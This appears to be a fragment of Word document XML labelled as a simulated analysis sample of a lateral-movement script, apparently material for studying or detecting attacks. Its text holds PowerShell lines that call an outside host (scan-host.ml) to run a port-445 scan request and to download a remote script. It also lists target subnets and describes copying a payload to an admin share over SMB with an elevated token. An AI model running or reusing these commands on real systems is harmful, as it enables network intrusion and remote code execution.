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o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:body>
    <w:p><w:r><w:t xml:space="preserve">SIMULATED ARTIFACT - ANALYSIS SAMPLE - LATERAL MOVEMENT SCRIPT REVIEW</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Module NetWarpScanner</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Sub ScanNetwork()</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Shell("powershell -Command Invoke-WebRequest -Uri http://scan-host.ml/network/exploit?ip=10.0.0.0/24&port=445")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">PowerShell -Command (New-Object System.Net.WebClient).DownloadString("http://scan-host.ml/tools/scan.ps1")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Target list: 10.0.0.0/24, 172.16.4.0/24, 192.168.10.0/24</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Payload copied to \\TARGET-CORP\C$\Windows\Temp\sc.exe via SMB.</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Scanner executed with elevated token; SMBv1 fallback enabled.</w:t></w:r></w:p>
  </w:body>
</w:document>

</file>